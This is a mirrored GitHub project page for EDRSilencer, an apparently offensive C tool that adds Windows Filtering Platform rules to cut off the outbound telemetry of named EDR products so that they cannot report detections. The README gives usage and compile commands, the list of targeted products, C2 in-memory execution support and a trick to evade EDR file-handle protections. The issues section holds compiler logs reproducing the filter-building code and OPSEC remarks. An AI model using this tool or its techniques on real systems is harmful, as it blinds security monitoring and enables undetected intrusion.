GithubHelp home page GithubHelp logo

netero1010 / edrsilencer Goto Github PK

View Code? Open in Web Editor NEW
911.0 13.0 122.0 167 KB

A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server.

License: MIT License

C 100.00%

edrsilencer's Introduction

EDRSilencer

Inspired by the closed source FireBlock tool FireBlock from MdSec NightHawk, I decided to create my own version and this tool was created with the aim of blocking the outbound traffic of running EDR processes using Windows Filtering Platform (WFP) APIs.

This tool offers the following features:

  • Search known running EDR processes and add WFP filter to block its outbound traffic
  • Add WFP filter for a specific process
  • Remove all WFP filters created by this tool
  • Remove a specific WFP filter by filter id
  • Support to run in C2 with in-memory PE execution module (e.g., BruteRatel's memexec)
  • Some EDR controls (e.g., minifilter) deny access when a process attempts to obtain a file handle of its EDR processes (e.g., through CreateFileW). However, the FwpmGetAppIdFromFileName0 API, which is used to obtain the FWP app id of the targeted EDR process, calls CreateFileW internally. To avoid this, a custom FwpmGetAppIdFromFileName0 was implemented to construct the app id without invoking CreateFileW, thus preventing unexpected failures when adding a WFP filter to an EDR process

The tool currently supports the following EDRs:

  • Microsoft Defender for Endpoint and Microsoft Defender Antivirus
  • Elastic EDR
  • Trellix EDR
  • Qualys EDR
  • SentinelOne
  • Cylance
  • Cybereason
  • Carbon Black EDR
  • Carbon Black Cloud
  • Tanium
  • Palo Alto Networks Traps/Cortex XDR
  • FortiEDR
  • Cisco Secure Endpoint (Formerly Cisco AMP)
  • ESET Inspect
  • Harfanglab EDR
  • TrendMicro Apex One

As I do not have access to all these EDRs for testing, please do not hesitate to correct me if the listed processes (edrProcess in EDRSilencer.c) prove insufficient in blocking all alert, detection, or event forward traffic.

Testing Environment

Tested in Windows 10 and Windows Server 2016

Usage

Usage: EDRSilencer.exe <blockedr/block/unblockall/unblock>
- Add WFP filters to block the IPv4 and IPv6 outbound traffic of all detected EDR processes:
  EDRSilencer.exe blockedr

- Add WFP filters to block the IPv4 and IPv6 outbound traffic of a specific process (full path is required):
  EDRSilencer.exe block "C:\Windows\System32\curl.exe"

- Remove all WFP filters applied by this tool:
  EDRSilencer.exe unblockall

- Remove a specific WFP filter based on filter id:
  EDRSilencer.exe unblock <filter id>

Compile

x86_64-w64-mingw32-gcc EDRSilencer.c utils.c -o EDRSilencer.exe -lfwpuclnt

Example

Detect and block the outbound traffic of running EDR processes

EDRSilencer.exe blockedr

HowTo

Credits

https://www.mdsec.co.uk/2023/09/nighthawk-0-2-6-three-wise-monkeys/

edrsilencer's People

Contributors

logdumpster avatar netero1010 avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

scriptidiot wisdark yeah9782 v1rtu0l haunted-banshee sec-fork bravery9 sorabug fengjixuchui askyeye test1213145 lleon1435 zmkeh xkroot xalicex gmh5225 massimiliano-dalcero rajatsharma1337 xcalibure2 gavz sec-js 827dream matt-culbert raystyle lck0 cyb3rm3g a7t0fwa7 h1d3r logdumpster an0x03e8 y11en pizz33 zflemingg1 b34c0n5 ptf569 emdnaia mellonaut beerandgin maliciousgroup v4nyl zpaav gmichel007 gladiatx0r tigr0w kawa5604 apkc unleashedmen silovikrhv zha0 10cks sm0n3p mahyarx ongyuann jabdy86 thedudesrepo opensesamedoors aaaddress1 canaankao hasksomatotoian umsundu dummykitty dn9uy3n john-r12 pbssubhash bankrupcy reiterjr kennyzeng oakkaya curtishoughton ak4l3r3 analyticsearch wolfthefallen c0c0red bobby-tablez eoncom shadowprowler 0gr3n1nj4 woaiqiukui 0x0000141 werwolfz devisions ipop oops4git d33dp00l rajivraj samy4samy dano7 petrescugit thinkst-cs bigbrobro drcyb3rr dmore s3ancascadia red-infosec techris45 minkione li2856705 jeffchan69 nuts7 talibosmani

edrsilencer's Issues

Compilation failure

GCC version:

> x86_64-w64-mingw32-gcc --version                                          
x86_64-w64-mingw32-gcc (GCC) 9.3-win32 20200320
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Error log:

EDRSilencer.c: In function ‘BlockEdrProcessTraffic’:
EDRSilencer.c:106:5: warning: implicit declaration of function ‘FwpmEngineOpen0’ [-Wimplicit-function-declaration]
  106 |     FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
      |     ^~~~~~~~~~~~~~~
EDRSilencer.c:137:17: warning: implicit declaration of function ‘QueryFullProcessImageNameW’ [-Wimplicit-function-declaration]
  137 |                 QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
      |                 ^~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:138:17: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  138 |                 FWPM_FILTER_CONDITION0 cond;
      |                 ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:139:17: error: unknown type name ‘FWPM_FILTER0’
  139 |                 FWPM_FILTER0 filter = {0};
      |                 ^~~~~~~~~~~~
EDRSilencer.c:142:21: warning: implicit declaration of function ‘FwpmGetAppIdFromFileName0’ [-Wimplicit-function-declaration]
  142 |                 if (FwpmGetAppIdFromFileName0(fullPath, &appId) != ERROR_SUCCESS) {
      |                     ^~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:149:23: error: request for member ‘displayData’ in something not a structure or union
  149 |                 filter.displayData.name = filterName;
      |                       ^
EDRSilencer.c:150:23: error: request for member ‘flags’ in something not a structure or union
  150 |                 filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |                       ^
EDRSilencer.c:151:23: error: request for member ‘layerKey’ in something not a structure or union
  151 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |                       ^
EDRSilencer.c:152:23: error: request for member ‘action’ in something not a structure or union
  152 |                 filter.action.type = FWP_ACTION_BLOCK;
      |                       ^
EDRSilencer.c:153:21: error: request for member ‘fieldKey’ in something not a structure or union
  153 |                 cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |                     ^
EDRSilencer.c:154:21: error: request for member ‘matchType’ in something not a structure or union
  154 |                 cond.matchType = FWP_MATCH_EQUAL;
      |                     ^
EDRSilencer.c:155:21: error: request for member ‘conditionValue’ in something not a structure or union
  155 |                 cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |                     ^
EDRSilencer.c:156:21: error: request for member ‘conditionValue’ in something not a structure or union
  156 |                 cond.conditionValue.byteBlob = appId;
      |                     ^
EDRSilencer.c:157:23: error: request for member ‘filterCondition’ in something not a structure or union
  157 |                 filter.filterCondition = &cond;
      |                       ^
EDRSilencer.c:158:23: error: request for member ‘numFilterConditions’ in something not a structure or union
  158 |                 filter.numFilterConditions = 1;
      |                       ^
EDRSilencer.c:164:26: warning: implicit declaration of function ‘FwpmFilterAdd0’ [-Wimplicit-function-declaration]
  164 |                 result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
      |                          ^~~~~~~~~~~~~~
EDRSilencer.c:171:23: error: request for member ‘layerKey’ in something not a structure or union
  171 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |                       ^
EDRSilencer.c:179:17: warning: implicit declaration of function ‘FwpmFreeMemory0’ [-Wimplicit-function-declaration]
  179 |                 FwpmFreeMemory0((void**)&appId);
      |                 ^~~~~~~~~~~~~~~
EDRSilencer.c:191:5: warning: implicit declaration of function ‘FwpmEngineClose0’ [-Wimplicit-function-declaration]
  191 |     FwpmEngineClose0(hEngine);
      |     ^~~~~~~~~~~~~~~~
EDRSilencer.c: In function ‘BlockProcessTraffic’:
EDRSilencer.c:203:5: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  203 |     FWPM_FILTER_CONDITION0 cond;
      |     ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:204:5: error: unknown type name ‘FWPM_FILTER0’
  204 |     FWPM_FILTER0 filter = {0};
      |     ^~~~~~~~~~~~
EDRSilencer.c:214:11: error: request for member ‘displayData’ in something not a structure or union
  214 |     filter.displayData.name = filterName;
      |           ^
EDRSilencer.c:215:11: error: request for member ‘flags’ in something not a structure or union
  215 |     filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |           ^
EDRSilencer.c:216:11: error: request for member ‘layerKey’ in something not a structure or union
  216 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |           ^
EDRSilencer.c:217:11: error: request for member ‘action’ in something not a structure or union
  217 |     filter.action.type = FWP_ACTION_BLOCK;
      |           ^
EDRSilencer.c:218:9: error: request for member ‘fieldKey’ in something not a structure or union
  218 |     cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |         ^
EDRSilencer.c:219:9: error: request for member ‘matchType’ in something not a structure or union
  219 |     cond.matchType = FWP_MATCH_EQUAL;
      |         ^
EDRSilencer.c:220:9: error: request for member ‘conditionValue’ in something not a structure or union
  220 |     cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |         ^
EDRSilencer.c:221:9: error: request for member ‘conditionValue’ in something not a structure or union
  221 |     cond.conditionValue.byteBlob = appId;
      |         ^
EDRSilencer.c:222:11: error: request for member ‘filterCondition’ in something not a structure or union
  222 |     filter.filterCondition = &cond;
      |           ^
EDRSilencer.c:223:11: error: request for member ‘numFilterConditions’ in something not a structure or union
  223 |     filter.numFilterConditions = 1;
      |           ^
EDRSilencer.c:236:11: error: request for member ‘layerKey’ in something not a structure or union
  236 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |           ^
EDRSilencer.c: In function ‘UnblockAllWfpFilters’:
EDRSilencer.c:254:5: error: unknown type name ‘FWPM_FILTER0’
  254 |     FWPM_FILTER0** filters;
      |     ^~~~~~~~~~~~
EDRSilencer.c:263:14: warning: implicit declaration of function ‘FwpmFilterCreateEnumHandle0’ [-Wimplicit-function-declaration]
  263 |     result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle);
      |              ^~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:270:18: warning: implicit declaration of function ‘FwpmFilterEnum0’ [-Wimplicit-function-declaration]
  270 |         result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters);
      |                  ^~~~~~~~~~~~~~~
EDRSilencer.c:274:13: warning: implicit declaration of function ‘FwpmFilterDestroyEnumHandle0’ [-Wimplicit-function-declaration]
  274 |             FwpmFilterDestroyEnumHandle0(hEngine, enumHandle);
      |             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:283:9: error: unknown type name ‘FWPM_DISPLAY_DATA0’
  283 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |         ^~~~~~~~~~~~~~~~~~
EDRSilencer.c:283:47: error: request for member ‘displayData’ in something not a structure or union
  283 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |                                               ^~
EDRSilencer.c:284:40: error: request for member ‘name’ in something not a structure or union
  284 |         WCHAR* currentFilterName = data->name;
      |                                        ^~
EDRSilencer.c:287:41: error: request for member ‘filterId’ in something not a structure or union
  287 |             UINT64 filterId = filters[0]->filterId;
      |                                         ^~
EDRSilencer.c:288:22: warning: implicit declaration of function ‘FwpmFilterDeleteById0’ [-Wimplicit-function-declaration]
  288 |             result = FwpmFilterDeleteById0(hEngine, filterId);
      |                      ^~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c: In function ‘UnblockWfpFilter’:
EDRSilencer.c:320:24: error: ‘FWP_E_FILTER_NOT_FOUND’ undeclared (first use in this function); did you mean ‘ERROR_FILE_NOT_FOUND’?
  320 |     else if (result == FWP_E_FILTER_NOT_FOUND) {
      |                        ^~~~~~~~~~~~~~~~~~~~~~
      |                        ERROR_FILE_NOT_FOUND
EDRSilencer.c:320:24: note: each undeclared identifier is reported only once for each function it appears in

Compile issue

Attempting to compile your project for testing, and getting the issues below.

I cloned down your project, following the readme used x86_64-w64-mingw32-gcc EDRSilencer.c -o EDRSilencer.exe -lfwpuclnt utils.c to attempt to compile.

Any help getting the build enviroment setup correct would be much apperciated.

my current mingw packages that are installed.

~/EDRSilencer(main) » apt search mingw | grep installed                                                                                                                   11:31:09

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

binutils-mingw-w64-i686/focal,now 2.34-5ubuntu1+8.8 amd64 [installed,automatic]
binutils-mingw-w64-x86-64/focal,now 2.34-5ubuntu1+8.8 amd64 [installed,automatic]
g++-mingw-w64/focal,focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 all [installed,automatic]
g++-mingw-w64-i686/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
g++-mingw-w64-x86-64/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gcc-mingw-w64/focal,focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 all [installed,automatic]
gcc-mingw-w64-base/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gcc-mingw-w64-i686/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gcc-mingw-w64-x86-64/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed,automatic]
gobjc-mingw-w64-x86-64/focal,now 9.3.0-7ubuntu1+22~exp1ubuntu4 amd64 [installed]
libnpth-mingw-w64-dev/focal,focal,now 1.6-1 all [installed]
mingw-w64/focal,focal,now 7.0.0-2 all [installed]
mingw-w64-common/focal,focal,now 7.0.0-2 all [installed]
mingw-w64-i686-dev/focal,focal,now 7.0.0-2 all [installed,automatic]
mingw-w64-tools/focal,now 7.0.0-2 amd64 [installed]
mingw-w64-x86-64-dev/focal,focal,now 7.0.0-2 all [installed,automatic]


~/EDRSilencer(main) »  x86_64-w64-mingw32-gcc --version
x86_64-w64-mingw32-gcc (GCC) 9.3-win32 20200320
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

~/EDRSilencer(main) »  x86_64-w64-mingw32-gcc EDRSilencer.c -o EDRSilencer.exe -lfwpuclnt utils.c
EDRSilencer.c: In function ‘GetProviderGUIDByDescription’:
EDRSilencer.c:128:5: error: unknown type name ‘FWPM_PROVIDER0’; did you mean ‘CRYPT_PROVIDERS’?
  128 |     FWPM_PROVIDER0** providers = NULL;
      |     ^~~~~~~~~~~~~~
      |     CRYPT_PROVIDERS
EDRSilencer.c:131:14: warning: implicit declaration of function ‘FwpmEngineOpen0’ [-Wimplicit-function-declaration]
  131 |     result = FwpmEngineOpen0(NULL, RPC_C_AUTHN_DEFAULT, NULL, NULL, &hEngine);
      |              ^~~~~~~~~~~~~~~
EDRSilencer.c:137:14: warning: implicit declaration of function ‘FwpmProviderCreateEnumHandle0’ [-Wimplicit-function-declaration]
  137 |     result = FwpmProviderCreateEnumHandle0(hEngine, NULL, &enumHandle);
      |              ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:140:9: warning: implicit declaration of function ‘FwpmEngineClose0’ [-Wimplicit-function-declaration]
  140 |         FwpmEngineClose0(hEngine);
      |         ^~~~~~~~~~~~~~~~
EDRSilencer.c:144:14: warning: implicit declaration of function ‘FwpmProviderEnum0’ [-Wimplicit-function-declaration]
  144 |     result = FwpmProviderEnum0(hEngine, enumHandle, 100, &providers, &numProviders);
      |              ^~~~~~~~~~~~~~~~~
EDRSilencer.c:152:25: error: request for member ‘displayData’ in something not a structure or union
  152 |         if (providers[i]->displayData.description != NULL) {
      |                         ^~
EDRSilencer.c:153:36: error: request for member ‘displayData’ in something not a structure or union
  153 |             if (wcscmp(providers[i]->displayData.description, providerDescription) == 0) {
      |                                    ^~
EDRSilencer.c:154:48: error: request for member ‘providerKey’ in something not a structure or union
  154 |                 *outProviderGUID = providers[i]->providerKey;
      |                                                ^~
EDRSilencer.c:161:9: warning: implicit declaration of function ‘FwpmFreeMemory0’ [-Wimplicit-function-declaration]
  161 |         FwpmFreeMemory0((void**)&providers);
      |         ^~~~~~~~~~~~~~~
EDRSilencer.c:164:5: warning: implicit declaration of function ‘FwpmProviderDestroyEnumHandle0’ [-Wimplicit-function-declaration]
  164 |     FwpmProviderDestroyEnumHandle0(hEngine, enumHandle);
      |     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c: In function ‘BlockEdrProcessTraffic’:
EDRSilencer.c:208:17: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  208 |                 FWPM_FILTER_CONDITION0 cond = {0};
      |                 ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:209:17: error: unknown type name ‘FWPM_FILTER0’
  209 |                 FWPM_FILTER0 filter = {0};
      |                 ^~~~~~~~~~~~
EDRSilencer.c:210:17: error: unknown type name ‘FWPM_PROVIDER0’; did you mean ‘CRYPT_PROVIDERS’?
  210 |                 FWPM_PROVIDER0 provider = {0};
      |                 ^~~~~~~~~~~~~~
      |                 CRYPT_PROVIDERS
EDRSilencer.c:215:17: warning: implicit declaration of function ‘QueryFullProcessImageNameW’ [-Wimplicit-function-declaration]
  215 |                 QueryFullProcessImageNameW(hProcess, 0, fullPath, &size);
      |                 ^~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:216:32: warning: implicit declaration of function ‘FwpmGetAppIdFromFileName0’ [-Wimplicit-function-declaration]
  216 |                 DWORD result = FwpmGetAppIdFromFileName0(fullPath, &appId);
      |                                ^~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:225:23: error: request for member ‘displayData’ in something not a structure or union
  225 |                 filter.displayData.name = filterName;
      |                       ^
EDRSilencer.c:226:23: error: request for member ‘flags’ in something not a structure or union
  226 |                 filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |                       ^
EDRSilencer.c:227:23: error: request for member ‘layerKey’ in something not a structure or union
  227 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |                       ^
EDRSilencer.c:228:23: error: request for member ‘action’ in something not a structure or union
  228 |                 filter.action.type = FWP_ACTION_BLOCK;
      |                       ^
EDRSilencer.c:229:21: error: request for member ‘fieldKey’ in something not a structure or union
  229 |                 cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |                     ^
EDRSilencer.c:230:21: error: request for member ‘matchType’ in something not a structure or union
  230 |                 cond.matchType = FWP_MATCH_EQUAL;
      |                     ^
EDRSilencer.c:231:21: error: request for member ‘conditionValue’ in something not a structure or union
  231 |                 cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |                     ^
EDRSilencer.c:232:21: error: request for member ‘conditionValue’ in something not a structure or union
  232 |                 cond.conditionValue.byteBlob = appId;
      |                     ^
EDRSilencer.c:233:23: error: request for member ‘filterCondition’ in something not a structure or union
  233 |                 filter.filterCondition = &cond;
      |                       ^
EDRSilencer.c:234:23: error: request for member ‘numFilterConditions’ in something not a structure or union
  234 |                 filter.numFilterConditions = 1;
      |                       ^
EDRSilencer.c:238:27: error: request for member ‘providerKey’ in something not a structure or union
  238 |                     filter.providerKey = &providerGuid;
      |                           ^
EDRSilencer.c:240:29: error: request for member ‘displayData’ in something not a structure or union
  240 |                     provider.displayData.name = providerName;
      |                             ^
EDRSilencer.c:241:29: error: request for member ‘displayData’ in something not a structure or union
  241 |                     provider.displayData.description = providerDescription;
      |                             ^
EDRSilencer.c:242:29: error: request for member ‘flags’ in something not a structure or union
  242 |                     provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
      |                             ^
EDRSilencer.c:243:30: warning: implicit declaration of function ‘FwpmProviderAdd0’ [-Wimplicit-function-declaration]
  243 |                     result = FwpmProviderAdd0(hEngine, &provider, NULL);
      |                              ^~~~~~~~~~~~~~~~
EDRSilencer.c:248:35: error: request for member ‘providerKey’ in something not a structure or union
  248 |                             filter.providerKey = &providerGuid;
      |                                   ^
EDRSilencer.c:254:26: warning: implicit declaration of function ‘FwpmFilterAdd0’ [-Wimplicit-function-declaration]
  254 |                 result = FwpmFilterAdd0(hEngine, &filter, NULL, &filterId);
      |                          ^~~~~~~~~~~~~~
EDRSilencer.c:261:23: error: request for member ‘layerKey’ in something not a structure or union
  261 |                 filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |                       ^
EDRSilencer.c: In function ‘BlockProcessTraffic’:
EDRSilencer.c:291:5: error: unknown type name ‘FWPM_FILTER_CONDITION0’
  291 |     FWPM_FILTER_CONDITION0 cond = {0};
      |     ^~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:292:5: error: unknown type name ‘FWPM_FILTER0’
  292 |     FWPM_FILTER0 filter = {0};
      |     ^~~~~~~~~~~~
EDRSilencer.c:293:5: error: unknown type name ‘FWPM_PROVIDER0’; did you mean ‘CRYPT_PROVIDERS’?
  293 |     FWPM_PROVIDER0 provider = {0};
      |     ^~~~~~~~~~~~~~
      |     CRYPT_PROVIDERS
EDRSilencer.c:312:11: error: request for member ‘displayData’ in something not a structure or union
  312 |     filter.displayData.name = filterName;
      |           ^
EDRSilencer.c:313:11: error: request for member ‘flags’ in something not a structure or union
  313 |     filter.flags = FWPM_FILTER_FLAG_PERSISTENT;
      |           ^
EDRSilencer.c:314:11: error: request for member ‘layerKey’ in something not a structure or union
  314 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
      |           ^
EDRSilencer.c:315:11: error: request for member ‘action’ in something not a structure or union
  315 |     filter.action.type = FWP_ACTION_BLOCK;
      |           ^
EDRSilencer.c:316:9: error: request for member ‘fieldKey’ in something not a structure or union
  316 |     cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;
      |         ^
EDRSilencer.c:317:9: error: request for member ‘matchType’ in something not a structure or union
  317 |     cond.matchType = FWP_MATCH_EQUAL;
      |         ^
EDRSilencer.c:318:9: error: request for member ‘conditionValue’ in something not a structure or union
  318 |     cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
      |         ^
EDRSilencer.c:319:9: error: request for member ‘conditionValue’ in something not a structure or union
  319 |     cond.conditionValue.byteBlob = appId;
      |         ^
EDRSilencer.c:320:11: error: request for member ‘filterCondition’ in something not a structure or union
  320 |     filter.filterCondition = &cond;
      |           ^
EDRSilencer.c:321:11: error: request for member ‘numFilterConditions’ in something not a structure or union
  321 |     filter.numFilterConditions = 1;
      |           ^
EDRSilencer.c:325:15: error: request for member ‘providerKey’ in something not a structure or union
  325 |         filter.providerKey = &providerGuid;
      |               ^
EDRSilencer.c:327:17: error: request for member ‘displayData’ in something not a structure or union
  327 |         provider.displayData.name = providerName;
      |                 ^
EDRSilencer.c:328:17: error: request for member ‘displayData’ in something not a structure or union
  328 |         provider.displayData.description = providerDescription;
      |                 ^
EDRSilencer.c:329:17: error: request for member ‘flags’ in something not a structure or union
  329 |         provider.flags = FWPM_PROVIDER_FLAG_PERSISTENT;
      |                 ^
EDRSilencer.c:335:23: error: request for member ‘providerKey’ in something not a structure or union
  335 |                 filter.providerKey = &providerGuid;
      |                       ^
EDRSilencer.c:348:11: error: request for member ‘layerKey’ in something not a structure or union
  348 |     filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;
      |           ^
EDRSilencer.c: In function ‘UnblockAllWfpFilters’:
EDRSilencer.c:366:5: error: unknown type name ‘FWPM_FILTER0’
  366 |     FWPM_FILTER0** filters = NULL;
      |     ^~~~~~~~~~~~
EDRSilencer.c:376:14: warning: implicit declaration of function ‘FwpmFilterCreateEnumHandle0’ [-Wimplicit-function-declaration]
  376 |     result = FwpmFilterCreateEnumHandle0(hEngine, NULL, &enumHandle);
      |              ^~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:383:18: warning: implicit declaration of function ‘FwpmFilterEnum0’ [-Wimplicit-function-declaration]
  383 |         result = FwpmFilterEnum0(hEngine, enumHandle, 1, &filters, &numFilters);
      |                  ^~~~~~~~~~~~~~~
EDRSilencer.c:387:13: warning: implicit declaration of function ‘FwpmFilterDestroyEnumHandle0’ [-Wimplicit-function-declaration]
  387 |             FwpmFilterDestroyEnumHandle0(hEngine, enumHandle);
      |             ^~~~~~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:396:9: error: unknown type name ‘FWPM_DISPLAY_DATA0’
  396 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |         ^~~~~~~~~~~~~~~~~~
EDRSilencer.c:396:47: error: request for member ‘displayData’ in something not a structure or union
  396 |         FWPM_DISPLAY_DATA0 *data = &filters[0]->displayData;
      |                                               ^~
EDRSilencer.c:397:40: error: request for member ‘name’ in something not a structure or union
  397 |         WCHAR* currentFilterName = data->name;
      |                                        ^~
EDRSilencer.c:400:41: error: request for member ‘filterId’ in something not a structure or union
  400 |             UINT64 filterId = filters[0]->filterId;
      |                                         ^~
EDRSilencer.c:401:22: warning: implicit declaration of function ‘FwpmFilterDeleteById0’ [-Wimplicit-function-declaration]
  401 |             result = FwpmFilterDeleteById0(hEngine, filterId);
      |                      ^~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:411:18: warning: implicit declaration of function ‘FwpmProviderDeleteByKey0’ [-Wimplicit-function-declaration]
  411 |         result = FwpmProviderDeleteByKey0(hEngine, &providerGuid);
      |                  ^~~~~~~~~~~~~~~~~~~~~~~~
EDRSilencer.c:413:27: error: ‘FWP_E_IN_USE’ undeclared (first use in this function); did you mean ‘STG_E_INUSE’?
  413 |             if (result != FWP_E_IN_USE) {
      |                           ^~~~~~~~~~~~
      |                           STG_E_INUSE
EDRSilencer.c:413:27: note: each undeclared identifier is reported only once for each function it appears in
EDRSilencer.c: In function ‘UnblockWfpFilter’:
EDRSilencer.c:445:24: error: ‘FWP_E_FILTER_NOT_FOUND’ undeclared (first use in this function); did you mean ‘ERROR_FILE_NOT_FOUND’?
  445 |     else if (result == FWP_E_FILTER_NOT_FOUND) {
      |                        ^~~~~~~~~~~~~~~~~~~~~~
      |                        ERROR_FILE_NOT_FOUND
EDRSilencer.c:454:27: error: ‘FWP_E_IN_USE’ undeclared (first use in this function); did you mean ‘STG_E_INUSE’?
  454 |             if (result != FWP_E_IN_USE) {
      |                           ^~~~~~~~~~~~
      |                           STG_E_INUSE

Blocking doesn't work

Hey,
Tried the release binary and also to compile my own (BTW, it was really challenging to compile successfully, GCC could not compile and VS required few modifications to succeed), and the WFP blocking doesn't effectively block the network traffic of the binary - I tried a number of binaries.
We can clearly see that the rule added successfully (e.g. by netsh wfp show state) but still the process can communicate.
image

Empty Provider

Hi,

Is this meant by you that it doesn't add or link to an existing WFP Provider ?
The rules do stand out due to this (for OPSEC perspective)

Regards
K4nfr3

Process name collision for Cisco Secure Endpoint (Formerly Cisco AMP)

The Cisco Secure Endpoint agent runs as sfc.exe, which is also the process name of the windows filesystem checker. I'm not sure if this would cause issues but it would at least cause the program to incorrectly identify the host as running Cisco Secure Endpoint.

Default path: C:\Program Files\Cisco\AMP\X.X.X\sfc.exe (X.X.X denotes the version number)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.